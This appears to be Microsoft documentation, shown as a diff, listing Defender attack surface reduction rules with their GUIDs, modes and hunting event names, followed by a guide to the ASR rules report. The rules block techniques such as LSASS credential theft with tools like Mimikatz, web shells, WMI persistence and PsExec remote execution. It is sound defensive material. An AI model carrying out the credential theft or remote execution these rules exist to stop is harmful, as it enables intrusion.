--- **Not configured** or **Disable**: The state in which the ASR rule isn't enabled or is disabled. The code for this state = 0.-- **Block**: The state in which the ASR rule is enabled. The code for this state is 1.-- **Audit**: The state in which the ASR rule is evaluated for the effect it would have on the organization or environment if enabled (set to block or warn). The code for this state is 2.-- **Warn** The state in which the ASR rule is enabled and presents a notification to the end-user, but permits the end-user to bypass the block. The code for this state is 6.-
-_Warn mode_ is a block-mode type that alerts users about potentially risky actions. Users can choose to bypass the block warning message and allow the underlying action. Users can select **OK** to enforce the block, or select the bypass option - **Unblock** - through the end-user pop-up toast notification that is generated at the time of the block. After the warning is unblocked, the operation is allowed until the next time the warning message occurs, at which time the end-user will need to reperform the action.
-
-When the allow button is clicked, the block is suppressed for 24 hours. After 24 hours, the end-user will need to allow the block again. The warn mode for ASR rules is only supported for RS5+ (1809+) devices. If bypass is assigned to ASR rules on devices with older versions, the rule will be in blocked mode.
-
-You can also set a rule in warn mode via PowerShell by specifying the AttackSurfaceReductionRules_Actions as "Warn". For example:
-
-```powershell
-Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Warn
-```
-
-## Per rule descriptions
-
-### Block abuse of exploited vulnerable signed drivers
-
-This rule prevents an application from writing a vulnerable signed driver to disk. In-the-wild, vulnerable signed drivers can be exploited by local applications \- _that have sufficient privileges_ \- to gain access to the kernel. Vulnerable signed drivers enable attackers to disable or circumvent security solutions, eventually leading to system compromise.
-
-The **Block abuse of exploited vulnerable signed drivers** rule doesn't block a driver already existing on the system from being loaded.
-
-> [!NOTE]
->
-> You can configure this rule using Intune OMA-URI. See [Intune OMA-URI](enable-attack-surface-reduction.md#custom-profile-in-intune) for configuring custom rules.
->
-> You can also configure this rule using [PowerShell](enable-attack-surface-reduction.md#powershell).
->
-> To have a driver examined, use this Web site to [Submit a driver for analysis](https://www.microsoft.com/en-us/wdsi/driversubmission).
-
-<!--The above link is the 'only link' that exists for having drivers examined. The 'en-us' component is required to make the link work. Any alterations to this link will result in a 404.
>-
-Intune Name: `Block abuse of exploited vulnerable signed drivers`
-
-Configuration Manager name: Not yet available
-
-GUID: `56a863a9-875e-4185-98a7-b882c64b5ce5`
-
-Advanced hunting action type:
--- `AsrVulnerableSignedDriverAudited`-- `AsrVulnerableSignedDriverBlocked`-
-<!--
-Dependencies: none provided by engineering
>-
-### Block Adobe Reader from creating child processes
-
-This rule prevents attacks by blocking Adobe Reader from creating processes.
-
-Malware can download and launch payloads and break out of Adobe Reader through social engineering or exploits. By blocking child processes from being generated by Adobe Reader, malware attempting to use Adobe Reader as an attack vector are prevented from spreading.
-
-Intune name: `Process creation from Adobe Reader (beta)`
-
-Configuration Manager name: Not yet available
-
-GUID: `7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c`
-
-Advanced hunting action type:
--- `AsrAdobeReaderChildProcessAudited`-- `AsrAdobeReaderChildProcessBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block all Office applications from creating child processes
-
-This rule blocks Office apps from creating child processes. Office apps include Word, Excel, PowerPoint, OneNote, and Access.
-
-Creating malicious child processes is a common malware strategy. Malware that abuses Office as a vector often runs VBA macros and exploit code to download and attempt to run more payloads. However, some legitimate line-of-business applications might also generate child processes for benign purposes; such as spawning a command prompt or using PowerShell to configure registry settings.
-
-Intune name: `Office apps launching child processes`
-
-Configuration Manager name: `Block Office application from creating child processes`
-
-GUID: `d4f940ab-401b-4efc-aadc-ad5f3c50688a`
-
-Advanced hunting action type:
--- `AsrOfficeChildProcessAudited`-- `AsrOfficeChildProcessBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block credential stealing from the Windows local security authority subsystem
-
-This rule helps prevent credential stealing by locking down Local Security Authority Subsystem Service (LSASS).
-
-LSASS authenticates users who sign in on a Windows computer. Microsoft Defender Credential Guard in Windows normally prevents attempts to extract credentials from LSASS. Some organizations can't enable Credential Guard on all of their computers because of compatibility issues with custom smartcard drivers or other programs that load into the Local Security Authority (LSA). In these cases, attackers can use tools like Mimikatz to scrape cleartext passwords and NTLM hashes from LSASS.
-
-By default the state of this rule is set to block. In most cases, many processes make calls to LSASS for access rights that are not needed. For example, such as when the initial block from the ASR rule results in a subsequent call for a lesser privilege which subsequently succeeds. For information about the types of rights that are typically requested in process calls to LSASS, see: [Process Security and Access Rights](/windows/win32/procthread/process-security-and-access-rights).
-
-Enabling this rule doesn't provide additional protection if you have LSA protection enabled since the ASR rule and LSA protection work similarly. However, when LSA protection cannot be enabled, this rule can be configured to provide equivalent protection against malware that target `lsass.exe`.
-
-> [!NOTE]
->
-> In this scenario, the ASR rule is classified as "not applicable" in Defender for Endpoint settings in the Microsoft Defender portal.
->
-> The *Block credential stealing from the Windows local security authority subsystem* ASR rule doesn't support WARN mode.
->
-> In some apps, the code enumerates all running processes and attempts to open them with exhaustive permissions. This rule denies the app's process open action and logs the details to the security event log. This rule can generate a lot of noise. If you have an app that simply enumerates LSASS, but has no real impact in functionality, there is no need to add it to the exclusion list. By itself, this event log entry doesn't necessarily indicate a malicious threat.
-
-Intune name: `Flag credential stealing from the Windows local security authority subsystem`
-
-Configuration Manager name: `Block credential stealing from the Windows local security authority subsystem`
-
-GUID: `9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2`
-
-Advanced hunting action type:
--- `AsrLsassCredentialTheftAudited`-- `AsrLsassCredentialTheftBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block executable content from email client and webmail
-
-This rule blocks email opened within the Microsoft Outlook application, or Outlook.com and other popular webmail providers from propagating the following file types:
--- Executable files (such as .exe, .dll, or .scr)-- Script files (such as a PowerShell .ps1, Visual Basic .vbs, or JavaScript .js file)-
-Intune name: `Execution of executable content (exe, dll, ps, js, vbs, etc.) dropped from email (webmail/mail client) (no exceptions)`
-
-Microsoft Configuration Manager name: `Block executable content from email client and webmail`
-
-GUID: `be9ba2d9-53ea-4cdc-84e5-9b1eeee46550`
-
-Advanced hunting action type:
--- `AsrExecutableEmailContentAudited`-- `AsrExecutableEmailContentBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-> [!NOTE]
-> The rule **Block executable content from email client and webmail** has the following alternative descriptions, depending on which application you use:
->
-> - Intune (Configuration Profiles): Execution of executable content (exe, dll, ps, js, vbs, etc.) dropped from email (webmail/mail client) (no exceptions).
-> - Configuration
-> - Group Policy: Block executable content from email client and webmail.
-
-### Block executable files from running unless they meet a prevalence, age, or trusted list criterion
-
-This rule blocks executable files, such as .exe, .dll, or .scr, from launching. Thus, launching untrusted or unknown executable files can be risky, as it might not be initially clear if the files are malicious.
-
-> [!IMPORTANT]
-> You must [enable cloud-delivered protection](/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus) to use this rule.
->
-> The rule **Block executable files from running unless they meet a prevalence, age, or trusted list criterion** with GUID `01443614-cd74-433a-b99e-2ecdc07bfc25` is owned by Microsoft and is not specified by admins. This rule uses cloud-delivered protection to update its trusted list regularly.
->
-> You can specify individual files or folders (using folder paths or fully qualified resource names) but you can't specify which rules or exclusions apply to.
-
-Intune name: `Executables that don't meet a prevalence, age, or trusted list criteria`
-
-Configuration Manager name: `Block executable files from running unless they meet a prevalence, age, or trusted list criteria`
-
-GUID: `01443614-cd74-433a-b99e-2ecdc07bfc25`
-
-Advanced hunting action type:
--- `AsrUntrustedExecutableAudited`-- `AsrUntrustedExecutableBlocked`-
-Dependencies: Microsoft Defender Antivirus, Cloud Protection
-
-### Block execution of potentially obfuscated scripts
-
-This rule detects suspicious properties within an obfuscated script.
-
-> [!IMPORTANT]
-> PowerShell scripts are now supported for the "Block execution of potentially obfuscated scripts" rule.
-
-Script obfuscation is a common technique that both malware authors and legitimate applications use to hide intellectual property or decrease script loading times. Malware authors also use obfuscation to make malicious code harder to read, which hampers close scrutiny by humans and security software.
-
-Intune name: `Obfuscated js/vbs/ps/macro code`
-
-Configuration Manager name: `Block execution of potentially obfuscated scripts`
-
-GUID: `5beb7efe-fd9a-4556-801d-275e5ffc04cc`
-
-Advanced hunting action type:
--- `AsrObfuscatedScriptAudited`-- `AsrObfuscatedScriptBlocked`-
-Dependencies: Microsoft Defender Antivirus, AntiMalware Scan Interface (AMSI)
-
-### Block JavaScript or VBScript from launching downloaded executable content
-
-This rule prevents scripts from launching potentially malicious downloaded content. Malware written in JavaScript or VBScript often acts as a downloader to fetch and launch other malware from the Internet.
-
-Although not common, line-of-business applications sometimes use scripts to download and launch installers.
-
-Intune name: `js/vbs executing payload downloaded from Internet (no exceptions)`
-
-Configuration Manager name: `Block JavaScript or VBScript from launching downloaded executable content`
-
-GUID: `d3e037e1-3eb8-44c8-a917-57927947596d`
-
-Advanced hunting action type:
--- `AsrScriptExecutableDownloadAudited`-- `AsrScriptExecutableDownloadBlocked`-
-Dependencies: Microsoft Defender Antivirus, AMSI
-
-### Block Office applications from creating executable content
-
-This rule prevents Office apps, including Word, Excel, and PowerPoint, from creating potentially malicious executable content, by blocking malicious code from being written to disk.
-
-Malware that abuses Office as a vector might attempt to break out of Office and save malicious components to disk. These malicious components would survive a computer reboot and persist on the system. Therefore, this rule defends against a common persistence technique. This rule also blocks execution of untrusted files that may have been saved by Office macros that are allowed to run in Office files.
-
-Intune name: `Office apps/macros creating executable content`
-
-Configuration Manager name: `Block Office applications from creating executable content`
-
-GUID: `3b576869-a4ec-4529-8536-b80a7769e899`
-
-Advanced hunting action type:
--- `AsrExecutableOfficeContentAudited`-- `AsrExecutableOfficeContentBlocked`-
-Dependencies: Microsoft Defender Antivirus, RPC
-
-### Block Office applications from injecting code into other processes
-
-This rule blocks code injection attempts from Office apps into other processes.
-
-> [!NOTE]
-> The Block applications from injecting code into other processes ASR rule does not support WARN mode.
-
-> [!IMPORTANT]
-> This rule requires restarting Microsoft 365 Apps (Office applications) for the configuration changes to take effect.
-
-Attackers might attempt to use Office apps to migrate malicious code into other processes through code injection, so the code can masquerade as a clean process.
-
-There are no known legitimate business purposes for using code injection.
-
-This rule applies to Word, Excel, OneNote, and PowerPoint.
-
-Intune name: `Office apps injecting code into other processes (no exceptions)`
-
-Configuration Manager name: `Block Office applications from injecting code into other processes`
-
-GUID: `75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84`
-
-Advanced hunting action type:
--- `AsrOfficeProcessInjectionAudited`-- `AsrOfficeProcessInjectionBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block Office communication application from creating child processes
-
-This rule prevents Outlook from creating child processes, while still allowing legitimate Outlook functions.
-
-This rule protects against social engineering attacks and prevents exploiting code from abusing vulnerabilities in Outlook. It also protects against [Outlook rules and forms exploits](https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/) that attackers can use when a user's credentials are compromised.
-
-> [!NOTE]
-> This rule blocks DLP policy tips and ToolTips in Outlook. This rule applies to Outlook and Outlook.com only.
-
-Intune name: `Process creation from Office communication products (beta)`
-
-Configuration Manager name: Not available
-
-GUID: `26190899-1602-49e8-8b27-eb1d0a1ce869`
-
-Advanced hunting action type:
--- `AsrOfficeCommAppChildProcessAudited`-- `AsrOfficeCommAppChildProcessBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block persistence through WMI event subscription
-
-This rule prevents malware from abusing WMI to attain persistence on a device.
-
-> [!IMPORTANT]
-> File and folder exclusions don't apply to this attack surface reduction rule.
-
-Fileless threats employ various tactics to stay hidden, to avoid being seen in the file system, and to gain periodic execution control. Some threats can abuse the WMI repository and event model to stay hidden.
-
-> [!NOTE]
-> If `CcmExec.exe` (SCCM Agent) is detected on the device, the ASR rule is classified as "not applicable" in Defender for Endpoint settings in the Microsoft Defender portal.
-
-Intune name: `Persistence through WMI event subscription`
-
-Configuration Manager name: Not available
-
-GUID: `e6db77e5-3df2-4cf1-b95a-636979351e5b`
-
-Advanced hunting action type:
--- `AsrPersistenceThroughWmiAudited`-- `AsrPersistenceThroughWmiBlocked`-
-Dependencies: Microsoft Defender Antivirus, RPC
-
-### Block process creations originating from PSExec and WMI commands
-
-This rule blocks processes created through [PsExec](/sysinternals/downloads/psexec) and [WMI](/windows/win32/wmisdk/about-wmi) from running. Both PsExec and WMI can remotely execute code. There's a risk of malware abusing functionality of PsExec and WMI for command and control purposes, or to spread an infection throughout an organization's network.
-
-> [!WARNING]
-> Only use this rule if you're managing your devices with [Intune](/intune) or another MDM solution. This rule is incompatible with management through [Microsoft Endpoint Configuration Manager](/configmgr) because this rule blocks WMI commands the Configuration Manager client uses to function correctly.
-
-Intune name: `Process creation from PSExec and WMI commands`
-
-Configuration Manager name: Not applicable
-
-GUID: `d1e49aac-8f56-4280-b9ba-993a6d77406c`
-
-Advanced hunting action type:
--- `AsrPsexecWmiChildProcessAudited`-- `AsrPsexecWmiChildProcessBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block rebooting machine in Safe Mode (preview)
-
-This rule prevents the execution of commands to restart machines in Safe Mode.
-
-Safe Mode is a diagnostic mode that only loads the essential files and drivers needed for Windows to run. However, in Safe Mode, many security products are either disabled or operate in a limited capacity, which allows attackers to further launch tampering commands, or simply execute and encrypt all files on the machine. This rule blocks such attacks by preventing processes from restarting machines in Safe Mode.
-
-> [!NOTE]
-> This capability is currently in preview. Additional upgrades to improve efficacy are under development.
-
-Intune Name: `[PREVIEW] Block rebooting machine in Safe Mode`
-
-Configuration Manager name: Not yet available
-
-GUID: `33ddedf1-c6e0-47cb-833e-de6133960387`
-
-Dependencies: Microsoft Defender Antivirus
-
-### Block untrusted and unsigned processes that run from USB
-
-With this rule, admins can prevent unsigned or untrusted executable files from running from USB removable drives, including SD cards. Blocked file types include executable files (such as .exe, .dll, or .scr)
-
-> [!IMPORTANT]
-> Files copied from the USB to the disk drive will be blocked by this rule if and when it's about to be executed on the disk drive.
-
-Intune name: `Untrusted and unsigned processes that run from USB`
-
-Configuration Manager name: `Block untrusted and unsigned processes that run from USB`
-
-GUID: `b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4`
-
-Advanced hunting action type:
--- `AsrUntrustedUsbProcessAudited`-- `AsrUntrustedUsbProcessBlocked`-
-Dependencies: Microsoft Defender Antivirus
-
-### Block use of copied or impersonated system tools (preview)
-
-This rule blocks the use of executable files that are identified as copies of Windows system tools. These files are either duplicates or impostors of the original system tools.
-
-Some malicious programs may try to copy or impersonate Windows system tools to avoid detection or gain privileges. Allowing such executable files can lead to potential attacks. This rule prevents propagation and execution of such duplicates and impostors of the system tools on Windows machines.
-
-> [!NOTE]
-> This capability is currently in preview. Additional upgrades to improve efficacy are under development.
-
-Intune Name: `[PREVIEW] Block use of copied or impersonated system tools`
-
-Configuration Manager name: Not yet available
-
-GUID: `c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb`
-
-Dependencies: Microsoft Defender Antivirus
-
-### Block Webshell creation for Servers
-
-This rule blocks web shell script creation on Microsoft Server, Exchange Role.
-
-A web shell script is a specifically crafted script that allows an attacker to control the compromised server. A web shell may include functionalities such as receiving and executing malicious commands, downloading and executing malicious files, stealing and exfiltrating credentials and sensitive information, identifying potential targets etc.
-
-Intune name: `Block Webshell creation for Servers`
-
-GUID: `a8f5898e-1dc8-49a9-9878-85004b8a61e6`
-
-Dependencies: Microsoft Defender Antivirus
-
-### Block Win32 API calls from Office macros
-
-This rule prevents VBA macros from calling Win32 APIs.
-
-Office VBA enables Win32 API calls. Malware can abuse this capability, such as [calling Win32 APIs to launch malicious shellcode](https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/) without writing anything directly to disk. Most organizations don't rely on the ability to call Win32 APIs in their day-to-day functioning, even if they use macros in other ways.
-
-Intune name: `Win32 imports from Office macro code`
-
-Configuration Manager name: `Block Win32 API calls from Office macros`
-
-GUID: `92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b`
-
-Advanced hunting action type:
--- `AsrOfficeMacroWin32ApiCallsAudited`-- `AsrOfficeMacroWin32ApiCallsBlocked`-
-Dependencies: Microsoft Defender Antivirus, AMSI
-
-### Use advanced protection against ransomware
-
-This rule provides an extra layer of protection against ransomware. It uses both client and cloud heuristics to determine whether a file resembles ransomware. This rule doesn't block files that have one or more of the following characteristics:
--- The file has already been found to be unharmful in the Microsoft cloud.-- The file is a valid signed file.-- The file is prevalent enough to not be considered as ransomware.-
-The rule tends to err on the side of caution to prevent ransomware.
-
-> [!NOTE]
-> You must [enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) to use this rule.
-
-Intune name: `Advanced ransomware protection`
-
-Configuration Manager name: `Use advanced protection against ransomware`
-
-GUID: `c1db55ab-c21a-4637-bb3f-a12568109d35`
-
-Advanced hunting action type:
--- `AsrRansomwareAudited`-- `AsrRansomwareBlocked`-
-Dependencies: Microsoft Defender Antivirus, Cloud Protection
-
-## See also
--- [Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)-- [Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)-- [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)-- [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)-- [Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)-- [Attack surface reduction rules report](attack-surface-reduction-rules-report.md)-- [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)--
security Attack Surface Reduction Rules Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-report.md
- Title: Attack surface reduction rules reporting
-description: Provides information about attack surface reduction rules detections, configuration, block threats, and methods to enable three standard rules and exclusions.
----------- m365-security-- tier2-- mde-asr Previously updated : 03/27/2023--
-# Attack surface reduction rules report
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-**Platforms:**
--- Windows--
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The attack surface reduction rules report provides information about the _attack surface reduction rules_ that are applied to devices in your organization. This report also provides information about:
--- detected threats-- blocked threats-- devices that aren't configured to use the standard protection rules to block threats-
-Additionally, this report provides an easy-to-use interface that enables you to:
--- View threat detections-- View the configuration of the ASR rules-- Configure (add) exclusions-- Easily activate _basic protection_ by enabling the three most recommended ASR rules with a single toggle-- Drill down to gather detailed information-
-For more information about individual attack surface reduction rules, see [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md).
-
-## Prerequisites
-
-> [!IMPORTANT]
-> To access the **Attack surface reduction rules report**, read permissions are required for the Microsoft Defender portal. Access to this report granted by Microsoft Entra roles, such as Security Global Admin or Security role, is being deprecated and will be removed in April 2023.
-> For Windows&nbsp;Server&nbsp;2012&nbsp;R2 and Windows&nbsp;Server&nbsp;2016 to appear in the **Attack surface reduction rules report**, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).
-
-## Report access permissions
-
-To access the **Attack surface reduction rules report** in the Microsoft 365 Security dashboard, the following permissions are required:
-
-| Permission type | Permission | Permission display name |
-|:|:|:|
-| Application | Machine.Read.All | 'Read all machine profiles' |
-|Delegated (work or school account) | Machine.Read | 'Read machine information' |
-
-To assign these permissions:
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with Security administrator or Global administrator role assigned.
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-1. Select the role you'd like to edit.
-1. Select **Edit**.
-1. In **Edit role**, on the **General** tab, in **Role name**, type a name for the role.
-1. In **Description** type a brief summary of the role.
-1. In **Permissions**, select **View Data**, and under **View Data** select **Attack surface reduction**.
-
-For more information about user role management, see [Create and manage roles for role-based access control](user-roles.md).
-
-## Navigation
-
-To navigate to the summary cards for the attack surface reduction rules report
-
-1. Open **Microsoft Defender XDR** portal.
-1. In the left panel, click**Reports**, and in the main section, under **Reports** select **Security report**.
-1. Scroll down to **Devices** to find the **Attack surface reduction rules** summary cards.
-
-The summary report cards for ASR rules are shown in the following figure.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-summary.png" alt-text="Shows the ASR rules report summary cards" lightbox="media/attack-surface-reduction-rules-report-summary.png":::
-
-## ASR rules report summary cards
-
-The ASR rules report summary is divided into two cards:
--- [**ASR rule detections** summary card](#asr-rules-detections-summary-card)-- [**ASR rule configuration** summary card](#asr-rules-configuration-summary-card)-
-### ASR rules detections summary card
-
-Shows a summary of the number of detected threats blocked by ASR rules.
-
-Provides two 'action' buttons:
--- View detections - opens the **Attack surface reduction rules** > main **Detections** tab-- Add exclusions - Opens the **Attack surface reduction rules** > main **Exclusions** tab--
-Clicking on the **ASR rules detections** link at the top of the card also opens the main [Attack surface reduction rules Detections tab](#attack-surface-reduction-rules-main-detections-tab).
-
-### ASR rules configuration summary card
-
-**The top section** focuses on three recommended rules, which protect against common attack techniques. This card shows current-state information about the computers in your organization that have the following [Three \(ASR\) standard protection rules](#simplified-standard-protection-option) set in **Block mode**, **Audit mode**, or **off** (not configured).The **Protect devices** button will show full configuration details for only the three rules; customers can quickly take action to enable these rules.
-
-**The bottom section** surfaces six rules based on the number of unprotected devices per rule. The "View configuration" button surfaces all configuration details for all ASR rules. The "Add exclusion" button shows the add exclusion page with all detected file/process names listed for Security Operation Center (SOC) to evaluate. The **Add exclusion** page is linked to Microsoft Intune.
-
-Provides two 'action' buttons:
--- View configuration - opens the **Attack surface reduction rules** > main **Detections** tab-- Add exclusions - Opens the **Attack surface reduction rules** > main **Exclusions** tab--
-Clicking on the **ASR rules configuration** link at the top of the card also opens the main [Attack surface reduction rules Configuration tab](#attack-surface-reduction-rules-main-configuration-tab).
-
-#### Simplified standard protection option
-
-The configuration summary card provides a button to **Protect devices** with the three standard protection rules. At minimum, Microsoft recommends that you enable these three attack surface reduction standard protection rules:
--- [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](attack-surface-reduction-rules-reference.md#block-credential-stealing-from-the-windows-local-security-authority-subsystem)-- [Block abuse of exploited vulnerable signed drivers](attack-surface-reduction-rules-reference.md#block-abuse-of-exploited-vulnerable-signed-drivers)-- [Block persistence through Windows Management Instrumentation (WMI) event subscription](attack-surface-reduction-rules-reference.md#block-persistence-through-wmi-event-subscription)-
-To enable the three standard protection rules:
-
-1. Select **Protect devices**. The main **Configuration** tab opens.
-1. On the **Configuration** tab, **Basic rules** automatically toggles from **All rules** to **Standard protection rules** enabled.
-1. In the **Devices** list, select the devices for which you want the standard protection rules to apply, and then select **Save**.
-
-This card has two other navigation buttons:
--- **View configuration** - Opens the **Attack surface reduction rules** > main **Configuration** tab.-- **Add exclusions** - Opens the **Attack surface reduction rules** > main **Exclusions** tab.-
-Clicking on the **ASR rules configuration** link at the top of the card also opens the main [Attack surface reduction rules Configuration tab](#attack-surface-reduction-rules-main-configuration-tab).
-
-## Attack surface reduction rules main tabs
-
-While the ASR rules report summary cards are useful for getting quick summary of your ASR rules status, the main tabs provide more in-depth, information with filtering and configuration capabilities:
--- [Detections tab](#attack-surface-reduction-rules-main-detections-tab)-- [Configuration tab](#attack-surface-reduction-rules-main-configuration-tab)-- [Exclusions tab](#attack-surface-reduction-rules-add-exclusions-tab)-
-### Search capabilities
-
- Search capability is added to **Detection**, **Configuration**, and **Add exclusion** main tabs. With this capability, you can search by using device ID, file name, or process name.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-tabs-search.png" alt-text="Shows the ASR rules report search feature." lightbox="media/attack-surface-reduction-rules-report-main-tabs-search.png":::
-
-### Filtering
-
-Filtering provides a way for you to specify what results are returned:
--- **Date** enables you to specify a date range for data results.-- **Filters**-
-> [!NOTE]
-> When filtering by rule, the number of individual _detected_ items listed in the lower half of the report is currently limited to 200 rules. You can use **Export** to save the full list of detections to Excel.
-
-> [!TIP]
-> As the filter currently functions in this release, every time you want to "group by", you must first scroll down to last detection in the list to load the complete data set. After you have loaded the complete data set, you can then launch the "sort by" filtering. If you don't scroll down to last detection listed on every use or when changing filtering options (for example, the ASR rules applied to the current filter run), then results will be incorrect for any result that has more than one viewable page of listed detections.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-tabs-search-configuration-tab.png" alt-text="Screenshot that shows the ASR rules report search feature on the configuration tab." lightbox="media/attack-surface-reduction-rules-report-main-tabs-search-configuration-tab.png":::
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/asr-defender365-filter.png" alt-text="Screenshot that shows the attack surface reduction rules detections filter on rules." lightbox="media/asr-defender365-filter.png":::
-
-### Attack surface reduction rules main detections tab
--- **Audit Detections** Shows how many threat detections were captured by rules set in _Audit_ mode.-- **Blocked Detections** Shows how many threat detections were blocked by rules set in _Block_ mode.-- **Large, consolidated graph** Shows blocked and audited detections.-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-detections-tab.png" alt-text="Shows the ASR rules report main detections tab, with _Audit detections_ and _Blocked detections_ outlined." lightbox="media/attack-surface-reduction-rules-report-main-detections-tab.png":::
-
-The graphs provide detection data over the displayed date range, with the capability to hover over a specific location to gather date-specific information.
-
-The bottom section of the report lists detected threats - on a per-device basis - with the following fields:
-
-| Field name| Definition |
-|:|:|
-| Detected file | The file determined to contain a possible or known threat |
-| Detected on | The date the threat was detected |
-| Blocked\/Audited? | Whether the detecting rule for the specific event was in Block or Audit mode |
-| Rule | Which rule detected the threat |
-| Source app | The application that made the call to the offending "detected file" |
-| Device | The name of the device on which the Audit or Block event occurred |
-| Device group | The Active Directory group to which the device belongs |
-| User | The machine account responsible for the call |
-| Publisher | The company that released the particular .exe or application |
-
-For more information about ASR rule audit and block modes, see [Attack surface reduction rule modes](attack-surface-reduction-rules-reference.md#asr-rule-modes).
-
-#### Actionable flyout
-
-The "Detection" main page has a list of all detections (files/processes) in the last 30 days. Select on any of the detections to open with drill-down capabilities.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-detections-flyout.png" alt-text="Shows the ASR rules report main detections tab flyout" lightbox="media/attack-surface-reduction-rules-report-main-detections-flyout.png":::
-
-The **Possible exclusion and impact** section provides impact of the selected file or process. You can:
--- Select **Go hunt** which opens the Advanced Hunting query page-- **Open file page** opens Microsoft Defender for Endpoint detection-- The **Add exclusion** button is linked with the add exclusion main page.-
-The following image illustrates how the Advanced Hunting query page opens from the link on the actionable flyout:
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-detections-flyout-hunting.png" alt-text="Shows the attack surface reduction rules report main detections tab flyout link opening Advanced Hunting" lightbox="media/attack-surface-reduction-rules-report-main-detections-flyout-hunting.png":::
-
-For more information about Advanced hunting, see [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](advanced-hunting-overview.md)
-
-### Attack surface reduction rules main Configuration tab
-
-The ASR rules main **Configuration** tab provides summary and per-device ASR rules configuration details. There are three main aspects to the Configuration tab:
-
-**Basic rules** Provides a method to toggle results between **Basic rules** and **All Rules**. By default, **Basic rules** is selected.
-
-**Device configuration overview** Provides a current snapshot of devices in one of the following states:
--- All exposed Devices (devices with missing prerequisites, rules in Audit mode, misconfigured rules, or rules not configured)-- Devices with rules not configured-- Devices with rules in audit mode-- Devices with rules in block mode-
-**The lower, unnamed section** of the Configuration tab provides a listing of the current state of your devices (on a per-device basis):
--- Device (name)-- Overall configuration (Whether any rules are on or all are off)-- Rules in block mode (the number of rules per-device set to block)-- Rules in audit mode (the number of rules in audit mode)-- Rules turned off (rules that are turned off or aren't enabled)-- Device ID (device GUID)-
-These elements are shown in the following figure.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-configuration-tab.png" alt-text="Shows the ASR rules report main configuration tab" lightbox="media/attack-surface-reduction-rules-report-main-configuration-tab.png":::
-
-To enable ASR rules:
-
-1. Under **Device**, select the device or devices for which you want to apply ASR rules.
-1. In the flyout window, verify your selections and then select **Add to policy**.
-
-The **Configuration** tab and _add rule_ flyout are shown in the following image.
-
-> [NOTE!]
-> If you have devices that require that different ASR rules be applied, you should configure those devices individually.
-
->:::image type="content" source="media/attack-surface-reduction-rules-report-configuration-add-to-policy.png" alt-text="Shows the ASR rules fly-out to add ASR rules to devices" lightbox="media/attack-surface-reduction-rules-report-configuration-add-to-policy.png":::
-
-### Attack surface reduction rules Add exclusions tab
-
-The **Add exclusions** tab presents a ranked list of detections by file name and provides a method to configure exclusions. By default, **Add exclusions** information is listed for three fields:
--- **File name** The name of the file that triggered the ASR rules event.-- **Detections** The total number of detected events for named file. Individual devices can trigger multiple ASR rules events.-- **Devices** The number of devices on which the detection occurred.-
->:::image type="content" source="media/attack-surface-reduction-rules-report-exclusion-tab.png" alt-text="Shows the ASR rules report add exclusions tab" lightbox="media/attack-surface-reduction-rules-report-exclusion-tab.png":::
-
-> [!IMPORTANT]
-> Excluding files or folders can severely reduce the protection provided by ASR rules. Excluded files are allowed to run, and no report or event will be recorded.
-> If ASR rules are detecting files that you believe shouldn't be detected, you should [use audit mode first to test the rule](attack-surface-reduction-rules-deployment-test.md#step-1-test-attack-surface-reduction-rules-using-audit).
-
-When you select a file, a **Summary & expected impact** fly out opens, presenting the following types of information:
